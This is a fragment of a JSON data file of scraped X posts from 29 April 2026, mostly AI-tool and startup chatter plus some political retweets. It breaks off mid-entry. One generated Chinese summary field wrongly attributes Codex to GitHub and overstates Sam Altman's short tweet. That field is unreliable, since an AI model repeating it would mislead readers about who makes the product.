+ "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "没建工作流前,每天起床打开 X 刷一会儿就开始焦虑——爆款看不完、KOL 推文跟不上、PM 平台又升级了不知道哪条该 follow。\n\n现在每天 30 分钟跑一次 /today + /morning,把当天外部信息流梳成可执行清单:\n\n合计 31 条 · 预计 6-8h 消化完\n\n每条都明确动作:写推 / 评估装不装 / 扫一眼跳过 / 私享给付费读者 / 进 backlog 推到周日。\n\n跑完那一刻焦虑感一下消失——不是因为信息少了,是因为每条都已经被计划好,知道做不做、什么时候做。\n\n简直是 INTJ 的极度舒适时刻!😂\n\n用的就是 Claude Code + 我自己写的两个 skill:/today 看内部(策略 / 在途任务 / 本周目标),/morning 扫外部(KOL 爆款 / GitHub trending / TG 23 频道 / PM 平台变更 / L3 AI 行业 / 私聊 / 深读 ≥3 篇)。\n\n明天起床又会有新的 30+ 条,但这就是日常。舒服😌", + "url": "https://x.com/runes_leo/status/2049631565710528661", + "published_at": "2026-04-29T23:27:00+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "今日在大阪,欢迎约饭👋", + "url": "https://x.com/Stv_Lynn/status/2049631472693448778", + "published_at": "2026-04-29T23:26:38+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Most people are not ready for the AI future inside companies.\n\nIt requires a real step change in skills and mindset.\n\nAnd as companies transition, not adapting will become a blocker, which is why more layoffs are likely.\"\n\nWhat do employees not know that all of them should know @jasonlk @moraitakis @karrisaarinen @PawelHuryn", + "url": "https://x.com/HarryStebbings/status/2049629049174057023", + "published_at": "2026-04-29T23:17:00+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What is best Italian in SF?", + "url": "https://x.com/eladgil/status/2049625013310120188", + "published_at": "2026-04-29T23:00:58+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration:\n\n“I’d be surprised if we don’t go down the path of license revocation for some. It will be up to them and their conduct.”\n\nThis is fascism. This is what they do in authoritarian countries.\n\nThis is cancel culture on steroids.\n\nWhere’s the outrage?", + "url": "https://x.com/ylecun/status/2049621796736180438", + "published_at": "2026-04-29T22:48:11+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Really enjoyed this conversation w @tferriss", + "url": "https://x.com/eladgil/status/2049620148123001125", + "published_at": "2026-04-29T22:41:38+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: x.com/i/article/204961669954…", + "url": "https://x.com/frxiaobei/status/2049617833370202182", + "published_at": "2026-04-29T22:32:26+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: NEW podcast episode is up! \n\nElad Gil (@eladgil), Consigliere to Empire Builders — How to Spot Billion-Dollar Companies Before Everyone Else, The Misty AI Frontier, How Coke Beat Pepsi, When Consensus Pays, and Much More\n\nElad Gil (@eladgil) is CEO of Gil & Co, a multi-stage investment firm, holding company, and operating company working on the world’s most advanced technologies. \n\nElad is a serial entrepreneur, operating executive, and investor or advisor to private companies, including AirBnB, Anduril, Coinbase, Figma, Instacart, OpenAI, SpaceX, and Stripe. \n\nHe was previously VP of Corporate Strategy at Twitter and started mobile at Google. He was the founder and CEO of Mixerlabs and Color. \n\nElad is the author of the bestseller High Growth Handbook: Scaling Startups from 10 to 10,000 People.\n\nPlease enjoy!", + "url": "https://x.com/eladgil/status/2049615184730132940", + "published_at": "2026-04-29T22:21:54+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: 感谢关注,完整节目链接: https://youtu.be/CIDVbaXWp64?si=XmOgN-1yDrXeOOO5", + "url": "https://x.com/GoSailGlobal/status/2049615062109974893", + "published_at": "2026-04-29T22:21:25+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Thread 🤯", + "url": "https://x.com/pmarca/status/2049614600807780717", + "published_at": "2026-04-29T22:19:35+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: After days of painstaking “research,” I finally figured out how “hostile foreign forces” infiltrated China:\n\nIt all began when a German named Karl decided to “lie flat” to escape the respectable career path his lawyer father had mapped out for him. He fled to London, where his", + "url": "https://x.com/pmarca/status/2049611573598298249", + "published_at": "2026-04-29T22:07:33+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "But then...", + "url": "https://x.com/pmarca/status/2049610871580885368", + "published_at": "2026-04-29T22:04:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "😍", + "url": "https://x.com/pmarca/status/2049610427341078931", + "published_at": "2026-04-29T22:03:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Rebranding to 'forward deployed engineer' from 'consultant' one of the great all time recruiting whammies.\"", + "url": "https://x.com/pmarca/status/2049610057302831190", + "published_at": "2026-04-29T22:01:32+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"The problem with short sellers is the asymmetry.\n\nThey can take positions, publish dramatic reports and profit from market reactions with little downside if they are wrong.\n\nMeanwhile, public companies are heavily regulated and cannot respond as freely, creating an uneven playing field.\"\n\nWhat would you most like to change about the way short sellers operate @chamath @BillAckman @jeffiel @davidsacks @elonmusk", + "url": "https://x.com/HarryStebbings/status/2049604386628960684", + "published_at": "2026-04-29T21:39:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Jessica and I have been talking about how earnest Swedish founders seem. Obviously it's news to no one that Swedes would be earnest. But I don't think they themselves realize how valuable this quality is for founders specifically.\n\nhttps://paulgraham.com/earnest.html", + "url": "https://x.com/paulg/status/2049596317244997710", + "published_at": "2026-04-29T21:06:56+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Golden retriever energy! Co-sign.", + "url": "https://x.com/pmarca/status/2049594178347340210", + "published_at": "2026-04-29T20:58:26+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "A lot of people say they want to win, but the honest truth is they don’t.\n\nWanting to win is it consuming you. It being an obsession. It keeping you up at night, physically hurting you that you want to win that much.\n\nThat is wanting to win, the rest is just words.", + "url": "https://x.com/HarryStebbings/status/2049591116928877011", + "published_at": "2026-04-29T20:46:16+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Science is how we’ve cured diseases and how we just sent four humans around the Moon. It’s a big reason why we’re the greatest country on Earth, but firing the National Science Board shows just how much Trump doesn’t understand that.", + "url": "https://x.com/ylecun/status/2049590329871904801", + "published_at": "2026-04-29T20:43:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This sounds like hyperbole, but it's not. Measured by the effect you could have on the world, CTO of the Arc Institute could very well be the most important technical role in biology.", + "url": "https://x.com/paulg/status/2049590286599221578", + "published_at": "2026-04-29T20:42:58+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "It's astounding how fast Vanta has been growing. And for the best reason too: they made a really good product.", + "url": "https://x.com/paulg/status/2049588825135964389", + "published_at": "2026-04-29T20:37:10+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Really good people figure things out on their own.\n\nThey do not need constant mentorship, reviews or handholding.\n\nIf someone needs that level of support, they are likely not the kind of A player you want on the team.\"\n\nLove to hear your thoughts on this @anjneymidha @thejustinwelsh @harleyf @tfadell", + "url": "https://x.com/HarryStebbings/status/2049575949344157929", + "published_at": "2026-04-29T19:46:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This is what an impending midterm disaster looks like for Republicans. https://trib.al/eLV1GmR", + "url": "https://x.com/ylecun/status/2049561899189055901", + "published_at": "2026-04-29T18:50:10+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: Starting today, agents can now be Cloudflare customers. They can create a Cloudflare account, start a paid subscription, register a domain, and get back an API token to deploy code right away. https://cfl.re/4sY0Uxn", + "url": "https://x.com/GoSailGlobal/status/2049545195914498139", + "published_at": "2026-04-29T17:43:48+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "有没有人跟我一样 \n\n从Manus诞生 爆火 到现在 \n\n从来都没用过🫣", + "url": "https://x.com/Pluvio9yte/status/2049543714566176772", + "published_at": "2026-04-29T17:37:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why this $160 billion company does not have a product organization?\n\n\"We do not have a separate product organization, our engineers are the product managers.\n\nIn an AI native world, engineers need to be imaginative and think in terms of product, not just code.\n\nThey may not write every line themselves, but they must understand, review and own the output.\"\n\nWhat do product teams of the future look like @karrisaarinen @zoink @GergelyOrosz @lennysan @gustavs", + "url": "https://x.com/HarryStebbings/status/2049543233735106652", + "published_at": "2026-04-29T17:36:00+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204900192237…", + "url": "https://x.com/Pluvio9yte/status/2049542362410729975", + "published_at": "2026-04-29T17:32:32+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: \"The more you look at chatbots, the more you realize that they were rushed to market with very little consideration for the consequences,\" https://trib.al/StQPjzT", + "url": "https://x.com/GaryMarcus/status/2049534487852179834", + "published_at": "2026-04-29T17:01:15+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "全局md里面我之前只设置了CuiMao,没设定我的中文,所以老是乱翻译。下次干活先让他去市面上打听打听我的信息,然后再回来给我干活。事半功倍。", + "url": "https://x.com/CuiMao/status/2049533641563484523", + "published_at": "2026-04-29T16:57:53+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 看到朋友发了他的消息,打开看了下,在搞中转站了😅", + "url": "https://x.com/GoSailGlobal/status/2049530795833049270", + "published_at": "2026-04-29T16:46:34+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "傅总真的流量秃鹫,啥火搞啥\n\n看到评论区一片骂声,他其实把你们当助推器,直接block就好了\n\n再晒上我为什么block他,新粉可能不知道\n\n1️⃣ 这账号是编导在运营\n\n2️⃣ 宣称猎豹移动全员编程,还有编程作业,不知道现在咋样了\n\n3️⃣ 抠门,能把我们六位数的报价砍到三位数的人第一次见\n\n4️⃣ 搬运不注明出处\n\n。。。", + "url": "https://x.com/GoSailGlobal/status/2049530471013593290", + "published_at": "2026-04-29T16:45:17+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: github.com/Cuimao777/cuimao-…", + "url": "https://x.com/CuiMao/status/2049529840349614318", + "published_at": "2026-04-29T16:42:47+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "RT by @CuiMao: Deepseek v4挺好的,接入claude code花了5.65块,把英语原版的30万字汉化成了EPUB,结果还有模有样的,借鉴了宝玉 @dotey 的Skill做了节省token的优化处理方案。评论区拿skill", + "url": "https://x.com/CuiMao/status/2049529746279796864", + "published_at": "2026-04-29T16:42:24+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I think it is still unclear to me whether the gap between \"data in training set\" v.s. \"data in SKILL.md\" can be closed with further training on more SKILL.md, assuming latent reasoning will never materialize.", + "url": "https://x.com/liuliu/status/2049526702334972397", + "published_at": "2026-04-29T16:30:18+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "君子生非异也,善假于 AI 也。\n— A子", + "url": "https://x.com/0xAA_Science/status/2049525966628958553", + "published_at": "2026-04-29T16:27:23+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "到香港后发现带的是大陆转英标的插座,崩溃", + "url": "https://x.com/Stv_Lynn/status/2049522162411995640", + "published_at": "2026-04-29T16:12:16+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: You can now ask Gemini to create Docs, Sheets, Slides, PDFs, and more directly in your chat. No more copying, pasting, or reformatting, just prompt and download.\n\nAvailable globally for all @GeminiApp users.", + "url": "https://x.com/JeffDean/status/2049519281600373159", + "published_at": "2026-04-29T16:00:49+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "刚好今天下午跟团队开会,聊到了 Symphony。\n\n过去这段时间团队手搓了一套系统,想解决一个很现实的问题:\n别再让产品和技术被各自的工具链锁住了。\n\n现阶段虽然 AI Coding 大家虽然玩的很溜,但认知上还未对齐,还在遵守老的规范,产品做需求,做完需求评审,评审完以后技术守着 codex、claude code 或者 cursor 这种本地工具,开发协作还是靠人肉对齐,整个过程其实很割裂,效率也不稳定。\n\n这个平台做的事情很简单粗暴,要把这些能力收敛到同一套平台里,让 coding 从人驱动工具切换变成 Agent 任务驱动。\n\n今天刚好讨论的一个关键点就是任务要用 Symphony 串起来。\n\n什么意思?\n\n就是以后团队里任何一个人,只要不颠覆大的设计目标,都可以直接提需求 → AI 自动拆解 → 自动构建 → 自动交付初版。\n\n所有人要做的事情只剩两件,提需求、验证、兜底。\n\n你可能会说,OpenAI、Authoropic 这些公司已经这么干了,但其实对于我们来说,现阶段可能刚刚好。\n\n现状是开发到提测这个流程是没什么问题了,接下来我们打算把产品也收到这里边来,测试也尝试对接进来,看看到底能走到一哪一步。", + "url": "https://x.com/frxiaobei/status/2049516252281135554", + "published_at": "2026-04-29T15:48:47+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "今天才发现自己 80.8% 的 Claude Code skill 是装废的。\n\n读 Tw93 这篇学到了,description 写\"用于 X / X workflow\"是\"功能介绍型\",AI 主线程根本看不到何时该调它。\n\n52 个 skill 一直纳闷 codeburn 这个月 subagent 调用率为啥才 0.18%,可能的原因找到了。\n\n今天全改成 Use when + NOT when,1-2 周后回来对账。👀", + "url": "https://x.com/runes_leo/status/2049513537966674317", + "published_at": "2026-04-29T15:38:00+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "某校计算机与人工智能学院要求大学生签网络文明行为教育知情书\n其中杜绝跨境网络违规行为提到,严禁使用非法翻墙工具、拒绝访问境外非法网站、出售或使用“翻墙”软件", + "url": "https://x.com/realNyarime/status/2049508383762612287", + "published_at": "2026-04-29T15:17:31+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Pinned: Ling-2.6-flash is now open-source! A 104B MoE (7.4B active) built for agents. Ling-2.6-1T will follow today.\n\nHugging Face: https://huggingface.co/inclusionAI/Ling-2.6-flash\nModelScope: https://modelscope.cn/models/inclusionAI/Ling-2.6-flash\n\nDeploy on your own devices: https://recipes.vllm.ai/inclusionAI/Ling-2.6-flash?hardware=h200", + "url": "https://x.com/dingyi/status/2049507438156787936", + "published_at": "2026-04-29T15:13:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Do Rich Founders Make For Bigger Exits:\n\n\"In 2015, we got approached to sell the business for hundreds of millions of dollars, all cash.\n\nHad I not had the singles before, it might have been something that was very enticing to just cash out the whole thing at that point in time.\n\nBut because I knew my bank account was sound, I wasn't in it for money. I was trying to build big and really I felt like this had to be the home run.\" Adam Foroughi, @AppLovin\n\nHave you found that founders with prior wealth are correlated with larger exits due to their ability to go big @chadbyers @semil @honam @pitdesi?", + "url": "https://x.com/HarryStebbings/status/2049504982261714970", + "published_at": "2026-04-29T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "睡觉醒来,有 400 个好心人关注我,祝我破 10w 粉丝数吗?", + "url": "https://x.com/lxfater/status/2049501643071180855", + "published_at": "2026-04-29T14:50:44+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codebases.\n\nLearn more: http://cursor.com/blog/typescript-sdk", + "url": "https://x.com/cursor_ai/status/2049499876388454903", + "published_at": "2026-04-29T14:43:43+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board.\n\nUse Cursor to customize them for your use case:\nhttp://github.com/cursor/cookbook", + "url": "https://x.com/cursor_ai/status/2049499874043830389", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud.", + "url": "https://x.com/cursor_ai/status/2049499871980200082", + "published_at": "2026-04-29T14:43:42+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "RT by @frxiaobei: We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor.\n\nRun agents from CI/CD pipelines, create automations for end-to-end workflows, or embed agents directly inside your products.", + "url": "https://x.com/frxiaobei/status/2049499866217185492", + "published_at": "2026-04-29T14:43:40+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i meant a goblin moment, sorry", + "url": "https://x.com/sama/status/2049493797114126484", + "published_at": "2026-04-29T14:19:33+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like codex is having a chatgpt moment", + "url": "https://x.com/sama/status/2049493609028923826", + "published_at": "2026-04-29T14:18:48+00:00", + "source": "nitter", + "title_zh": "GitHub旗下代码生成AI工具Codex近期迎来类似ChatGPT的突破性进展,引发行业关注。" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "i love that the team does stuff like this", + "url": "https://x.com/sama/status/2049492646792757552", + "published_at": "2026-04-29T14:14:59+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Demis Hassabis (@demishassabis) has had one of the most extraordinary careers in tech.\n\nHe started as a chess prodigy and video game designer at 17 before getting a PhD in neuroscience and going on to found DeepMind. His lab cracked Go, solved protein structure prediction with AlphaFold, and then gave it away free to every scientist on earth. That work won him the 2024 Nobel Prize in Chemistry. Today he leads @GoogleDeepMind, pushing toward the same goal he set as a teenager: AGI. \n\nOn this special live episode of How to Build the Future, he sat down with YC's @garrytan to talk about what still needs to happen to get us to AGI, his advice for founders on how to stay ahead of the curve, and what the next big scientific breakthroughs might be.\n\n01:48 — What’s Missing Before We Get To AGI?\n03:36 — Why Memory Is Still Unsolved\n06:14 — How AlphaGo Shaped Gemini\n08:06 — Why Smaller Models Are Getting So Powerful\n10:46 — The 1000x Engineer\n12:40 — Continual Learning and the Future of Agents\n13:32 — Why AI Still Fails at Basic Reasoning\n15:33 — Are Agents Overhyped or Just Getting Started?\n18:31 — Can AI Become Truly Creative?\n20:26 — Open Models, Gemma, and Local AI\n22:26 — Why Gemini Was Built Multimodal\n24:08 — What Happens When Inference Gets Cheap?\n25:24 — From AlphaFold to the Virtual Cells\n28:24 — AI as the Ultimate Tool for Science\n30:43 — Advice for Founders\n33:30 — The AlphaFold Breakthrough Pattern\n35:20 — Can AI Make Real Scientific Discoveries?\n37:59 — What to Build Before AGI Arrives", + "url": "https://x.com/paulg/status/2049489217953374689", + "published_at": "2026-04-29T14:01:21+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "加了一些 AI 大 V 的微信才发现,原来,朋友圈都是孩子的日常,都是当爹的人了,孩子老大了。", + "url": "https://x.com/CuiMao/status/2049480920001114551", + "published_at": "2026-04-29T13:28:23+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Day 5 — Cursor 送的 $10K 刚烧到 $164,刚 1.64%。慢得我自己都着急。\n\n本来以为\"路还长\",今天才发现不是慢的问题,是方向错了。\n\n我现在 3 个 worker 并行在跑:白天我自己开 Claude / Codex 终端推任务,夜里 Codex loop 烧策略 / 数据基座的额度,Cursor 24/7 跑 daemon 一直不停。\n\n之前我把 Cursor 这个 loop 当成\"独立的产物 worker\"——跑批量产物(spec / outline / copy),跟 Claude / Codex 各干各的,专业分工。\n\n今天被自己打回重写。\n\nCursor 后端就有 claude-4.7 + gpt-5.5 模型,本来就能干 Claude / Codex 的活。目前感觉适合自己系统的角色是\"前置助理\"——研究 / 初稿 / 批量改 / 审计扫描这些前置部分给它跑,主线(白天我 + 夜间 Codex loop)只做最后一公里的判断和定稿。\n\n这份算力放在\"前置\"位置,给主线省 token,整个工作流的密度都拉起来。比让它孤立产物值多了。\n\n通用模式不止 Cursor:\n- ChatGPT 重度用户 → GPT-4o-mini 跑前置 → GPT-5 主线判断\n- Claude Code 重度用户 → Haiku subagent 跑前置 → Opus 主线判断\n- 任何多模型工作流 → 把便宜模型放在贵模型主线之前\n\n把贵的留在最后一公里。\n\n5/31 之前还有 32 天。接下来我计划逐渐让它融入我的主要工作流程。", + "url": "https://x.com/runes_leo/status/2049477802978664657", + "published_at": "2026-04-29T13:16:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: terminal has been my primary interface to my computer for almost two decades. now it’s the Codex app.", + "url": "https://x.com/sama/status/2049477747882254775", + "published_at": "2026-04-29T13:15:47+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "赛尔网络(CERNET)也就是教育网,为高校及科研机构提供「合法信道」\n据海豚机场测评消息,部分依赖国际资源的科研机构陆续收到通知,将提供专用浏览器、专用 Docker 来确保有限度的国际网络访问权限,访问目标网站现包括:各大国际学术出版社、Python 官网、谷歌全家桶(不含 Gemini)、Github、Hugging face、Docker Hub、XDA Forums 等 20 多个域名\n\n访问 https://scholar.edu.cn 须同时满足2个条件:\n1、使用 CERNET 网络(教育网)\n2、已申请该服务的高校/科研机构 (陆续分发中,部分单位分发早,部分单位也可能直到现在都未分发到位)", + "url": "https://x.com/realNyarime/status/2049476423602393208", + "published_at": "2026-04-29T13:10:31+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Github and critical work are becoming incompatible", + "url": "https://x.com/soumithchintala/status/2049475649157374146", + "published_at": "2026-04-29T13:07:26+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据xhs多名该校学生反应,华南师范大学(SCNU)已经开始对不安全的网络行为(例如翻墙)封禁校园网Portal认证账号,导致无法通过Web认证接入互联网\n各个学院都发了通知只要翻墙就要被拉黑写报告,不过scnu新开了一个学术浏览器,理论上可以访问谷歌学术", + "url": "https://x.com/realNyarime/status/2049467000012124233", + "published_at": "2026-04-29T12:33:04+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Jessica today. I told her if she went to Stockholm people would address her in Swedish. Someone did in the first hour we were there.", + "url": "https://x.com/paulg/status/2049465035362046224", + "published_at": "2026-04-29T12:25:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Just went to visit Legora. Most impressive startup I've been to visit in years. They're going to surpass Harvey in 2027. After that their only potential rivals will be the model companies. And if ever there was a territory you could defend against the model companies, law is it.", + "url": "https://x.com/paulg/status/2049462871260639448", + "published_at": "2026-04-29T12:16:40+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "已经有朋友联系我能提供0.5折的 Claude 反向代理API,还有朋友免费注册了几万个 ChatGPT plus 账号,长见识了。\n\n建了个 WTF AI 电报群,欢迎加入,申请时记得自我介绍下: \nhttps://t.me/+ZCnxv1CA0u5jMmU1", + "url": "https://x.com/0xAA_Science/status/2049462724216987766", + "published_at": "2026-04-29T12:16:05+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "\"They're all wearing solid colors. People here don't wear patterns. This is my kind of place.\"\n\n— Jessica on Stockholm", + "url": "https://x.com/paulg/status/2049459258907898272", + "published_at": "2026-04-29T12:02:19+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: \"A decade ago, AI was supposed to replace radiologists. Today, radiologists make more than $500,000 per year, and their employment continues to grow, see chart below. Reading scans is a task, not a job, and when the task gets cheaper, demand for the job grows.\"", + "url": "https://x.com/ylecun/status/2049456071278747804", + "published_at": "2026-04-29T11:49:39+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这段视频将会让你在半小时内学习 CodeX 95% 的能力\n\n视频重点拆解了 Codex 的 7项核心能力 及 1项附加功能:\n\n完整的文件访问权限:\nCodex 生成或读取的所有文件均直接存储在你的本地电脑中。它可以深度访问并分析本地文件夹的内容,例如扫描下载目录中杂乱的收据截图,然后直接在你的电脑上生成并保存一个包含分类统计与数据可视化的 Excel 仪表盘。\n\n持久化记忆 :\n系统支持“手动记忆”和“自动记忆”。你可以要求 AI 记住特定的排版喜好或工作规范(它会将其写入本地的 agents.md 文件中),让它在未来的任务中保持连贯性;此外,系统还会通过不可见的自动记忆文件,在后台记录并归纳你的常规任务习惯。\n\n插件生态:\n你可以将 Codex 与 Gmail、Notion、Slack 等外部工具相连接。比如,你可以使用 @Gmail 插件,让 AI 自动翻阅你近两周的邮件,提炼出所有的商业赞助邀请,并为你制作一份带有深入研究笔记的汇报清单。\n\n自定义技能:\n你可以将高频且复杂的工作流(SOP)固化为“技能”。当你通过多轮对话得到非常完美的 AI 产出时,只需告诉它“将此过程转换为一项技能”。之后你只要输入 / 唤出菜单,即可像调用快捷指令一样重复使用这套完美的工作流。\n\n内置高级图像生成:\n系统内置了顶级的图像生成模型(视频中演示为 GPT-image-2)。你可以在具体的项目文件夹内直接输入提示词,让 AI 根据参考图批量生成不同模特、不同场景的商品效果图,生成的图片会直接保存在你的本地项目文件中。\n\n浏览器与计算机控制:\n这是该工具最强大的特性之一,它能够像人类一样接管鼠标和键盘。例如,它可以自动打开电脑上的 Canva 应用帮你把生成的图片排版成幻灯片;或者在帮你开发完一款网页应用后,自动接管浏览器去点击页面上的各个按钮,进行深度的功能测试。\n\n日常任务自动化:\n你可以通过口语化的指令为其设定定时调度任务。例如对它说:“请在每周五早晨 9 点运行‘邮件梳理’技能,并自动更新那份表格”。系统便会创建一个自动化日程,在指定时间周期性地独立完成工作。\n\n附加功能:Chronicle (屏幕上下文感知):\n这是一款处于预览阶段的前沿功能。开启后,它会持续在后台记录你的屏幕画面。当你在制作幻灯片或网页时随时向 AI 提问,它能通过刚刚获取的屏幕记录瞬间理解你的上下文和当前进度,省去了你手动截图或上传文档的繁琐步骤。\n\n这部视频可以看作是 Codex 的速成操作指南,手把手演示了如何利用这个不仅能写代码,还能帮你操作本地电脑系统和处理各种繁琐文档的下一代 AI 代理工具。", + "url": 